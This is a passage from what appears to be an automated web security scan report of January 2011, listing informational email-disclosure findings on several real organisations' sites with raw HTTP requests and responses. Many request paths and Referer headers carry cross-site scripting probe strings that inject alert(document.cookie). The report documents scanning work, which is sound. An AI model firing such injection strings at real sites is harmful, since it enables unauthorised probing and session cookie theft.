Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:30 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.65. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:30 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.66. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:31 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.67. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:31 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.68. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:29 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.69. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.70. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.71. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.72. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.73. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:13 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.74. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.75. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:34 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.76. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.77. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:51:46 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.78. http://www.ebglaw.com/js/jquery.mousewheel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /js/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.mousewheel.js HTTP/1.1
Host: www.ebglaw.com
Proxy-Connection: keep-alive
Referer: http://www.ebglaw.com/showoffice.aspx?Show=542&5a79d'-alert(document.cookie)-'f0c22b0c26f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=mkavhri4srbzl255z4ebp2i3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2412
Content-Type: application/x-javascript
Last-Modified: Thu, 08 Apr 2010 23:25:01 GMT
Accept-Ranges: bytes
ETag: "7e6f18b672d7ca1:8167"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:53:18 GMT

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks to:
...[SNIP]...

17.79. http://www.ebglaw.com/showoffice.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /showoffice.aspx?Show=542 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a href="mailto:rreif@ebglaw.com">rreif@ebglaw.com</a>
...[SNIP]...

17.80. http://www.fulbright.com/aop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /aop

Issue detail

The following email address was disclosed in the response:

Request

GET /aop HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
